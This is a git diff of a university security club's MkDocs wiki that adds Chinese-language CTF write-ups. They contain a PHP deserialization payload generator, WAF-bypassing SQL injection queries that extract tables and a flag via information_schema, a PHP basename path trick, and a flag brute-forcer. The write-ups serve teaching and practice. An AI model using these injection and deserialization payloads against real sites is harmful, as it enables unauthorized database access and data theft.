+        $this->w00m = new w44m;
+    }
+}
+class w22m
+{
+    public $w00m;
+    public function __destruct()
+    {
+        echo $this->w00m;
+    }
+    public function __construct()
+    {
+        $this->w00m = new w33m;
+    }
+}
+
+$a = new w22m;
+echo "?w00m=".urlencode(serialize($a))
+    ?>
+
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-442-wp/index.html b/ctfnotes/problem-442-wp/index.html new file mode 100755 index 0000000..dcf5c76 --- /dev/null +++ b/ctfnotes/problem-442-wp/index.html @@ -0,0 +1,1283 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]sql - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]sql

    +
      +
    1. 传入wllm参数 +hint:Want Me? Cross the Waf +沙箱绕过 +主要限制为 +ban 空格 等号 限制输出大小20字
      2. +
    2. exp编写 +exp1(查询数据表) +?wllm=-1'union/**/select/**/1,group_concat(TABLE_NAME),3/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA/**/like/**/'test_db'%23 +可以看到test_db内的表 +有LTLT_flag和user +exp2(查询表内字段) +?wllm=-1'union/**/select/**/1,group_concat(COLUMN_NAME),3/**/from/**/information_schema.columns/**/where/**/TABLE_NAME/**/like/**/'LTLT_flag'%23 +exp3(输出flag) +?wllm=-1'union/**/select/**/1,mid(group_concat(flag),1,21),mid(group_concat(flag),21,40)/**/from/**/test_db.LTLT_flag%23
      3. +
    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-444-wp/index.html b/ctfnotes/problem-444-wp/index.html new file mode 100755 index 0000000..5fe564c --- /dev/null +++ b/ctfnotes/problem-444-wp/index.html @@ -0,0 +1,1310 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPUCTF 2021 新生赛]re1 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPUCTF 2021 新生赛]re1

    +
      +
    1. IDA反编译 +Img +发现只是做简单字符替换 +写exp
      2. +
    2. exp
      3. +
    +
    #include <iostream>
+using namespace std;
+string str2 = "{34sy_r3v3rs3}";
+void dfs(int now)
+{
+    if (now == str2.length() - 1)
+    {
+        cout << "NSSCTF" << str2 << endl;
+        return;
+    }
+    if (str2[now] == 52)
+    {
+        str2[now] = 97;
+        dfs(now + 1);
+        str2[now] = 52;
+        dfs(now + 1);
+    }
+    else if (str2[now] == 51)
+    {
+        str2[now] = 101;
+        dfs(now + 1);
+        str2[now] = 51;
+        dfs(now + 1);
+    }
+    else
+    {
+        dfs(now + 1);
+    }
+}
+int main()
+{
+    freopen("ans.txt", "w", stdout);
+    dfs(0);
+}
+
    +

    得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-463-wp/index.html b/ctfnotes/problem-463-wp/index.html new file mode 100755 index 0000000..3e10f0c --- /dev/null +++ b/ctfnotes/problem-463-wp/index.html @@ -0,0 +1,1276 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + [鹤城杯 2021]EasyP - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [鹤城杯 2021]EasyP

    +
      +
    1. 审阅代码 +知识点: +php会将 +' ','.','[','chr(128)-chr(159)'当做'_' +basename函数遇到非ascii会舍弃
      2. +
    +

    即可构建exp

    +

    /index.php/utils.php/%ff?show%20source

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/ctfnotes/problem-47-wp/index.html b/ctfnotes/problem-47-wp/index.html new file mode 100755 index 0000000..4638bb9 --- /dev/null +++ b/ctfnotes/problem-47-wp/index.html @@ -0,0 +1,1275 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + [SWPU 2020]套娃 - XMUTSEC Wiki + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + 跳转至 + + +
    +
    + +
    + + + + + + +
    + + + + + + + +
    + +
    + + + + +
    +
    + + + +
    +
    +
    + + + + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    +
    + + + +
    +
    + + + + + + + + +

    [SWPU 2020]套娃

    +

    ~~说好的套娃呢~~ +1. 下载得到xlsx +解压即得RC4data.txtswpu.xlsx +2. 解压swpu.xlsx +得esayrc4.xlsxRC4key.zip +3. 发现RC4key.zip需要密码 +去esayrc4.xlsx寻找线索 +发现esayrc4.xlsx无法解压HxD打开就找到了password +拿password解压RC4key.zip +然后在线解密下RC4data.txt就得到flag

    + + + + + + +

    评论

    + + +
    + + + +
    +
    + + +
    + +
    + +
    + +
    +
    +
    + +
    + 厦门理工大学信息安全协会(Xiamen University Of Technology Cyberspace Security Association) +
    + + + Made with + + Material for MkDocs + + +
    + +
    +
    +
    + +
    +
    +
    +
    + + + + + + + + + + + + \ No newline at end of file diff --git a/index.html b/index.html index bf8c4db..54772a6 100755 --- a/index.html +++ b/index.html @@ -227,6 +227,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -690,6 +706,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/member/index.html b/member/index.html index 95795b8..b64d1d7 100755 --- a/member/index.html +++ b/member/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -714,6 +730,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html index f57ac76..741aeea 100755 --- a/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html +++ b/posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html index 295a3b9..e7b0ae5 100755 --- a/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html +++ b/posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html index 8c8235f..4e850a0 100755 --- a/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html +++ b/posts/131885e3-191c-40ac-af0d-79835e15d45b/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -648,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html index 5d6027d..c346fcd 100755 --- a/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html +++ b/posts/6d1aa499-57ee-401b-a911-8062c6cae869/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html index d90d0b1..ad32ae4 100755 --- a/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html +++ b/posts/6eba13d5-1e74-4680-8a10-9c18763b6389/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -648,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html index 17665bd..c92c352 100755 --- a/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html +++ b/posts/72c8b299-29e5-4e88-a684-7c65b3931760/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -648,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html index 6f3d98f..26d15cd 100755 --- a/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html +++ b/posts/86e69101-77f4-484a-ba0e-2957afabbdb6/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html index 4783f32..520b834 100755 --- a/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html +++ b/posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html index d7f3779..e95e592 100755 --- a/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html +++ b/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -679,6 +695,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html index 2b301e3..bbc9e02 100755 --- a/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html +++ b/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html index 7b01eff..5d06a00 100755 --- a/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html +++ b/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html index 8a8d6d1..52e0c38 100755 --- a/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html +++ b/posts/bb168e48-791c-4a1d-83c4-335b9db12499/index.html @@ -224,6 +224,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -641,6 +657,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html index e455d4e..611d305 100755 --- a/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html +++ b/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/index.html @@ -229,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -648,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html index 4ea3ceb..b2f9f4c 100755 --- a/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html +++ b/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/index.html @@ -18,6 +18,8 @@ + + @@ -227,6 +229,22 @@ + + + + + + + + +
  • + + CTF Notes + +
    • + + + @@ -646,6 +664,433 @@ + + + + + + + + +
  • + + + + + + + + + + + +
    • + + + diff --git a/search/search_index.json b/search/search_index.json index 7c55937..5d24c1d 100755 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"

    \u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002

    \u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn

    "},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"

    \u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63

    "},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":""},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":""},{"location":"award/#_3","title":"\u4e3b\u529e","text":""},{"location":"award/#2023","title":"2023","text":"

    \uff08FUCK U, COVID-19/\ud83d\udc47\uff09

    "},{"location":"award/#2022","title":"2022","text":""},{"location":"award/#2021","title":"2021","text":"

    \uff08FUCK U, COVID-19/\ud83d\udc46\uff09

    "},{"location":"award/#2020","title":"2020","text":""},{"location":"award/#2019","title":"2019","text":""},{"location":"award/#2018","title":"2018","text":""},{"location":"award/#2017","title":"2017","text":""},{"location":"award/#2016","title":"2016","text":""},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":""},{"location":"member/#2020-2021","title":"2020-2021","text":""},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":""},{"location":"member/#2017-2018","title":"2017-2018","text":""},{"location":"member/#2016-2017","title":"2016-2017","text":""},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"

    \u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

    \u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

    \u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

    ","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"

    \u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002

    ","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"

    \u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002

    ","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"

    CTF\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06

    ","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"

    \u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002

    48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002

    \u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n

    \u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01

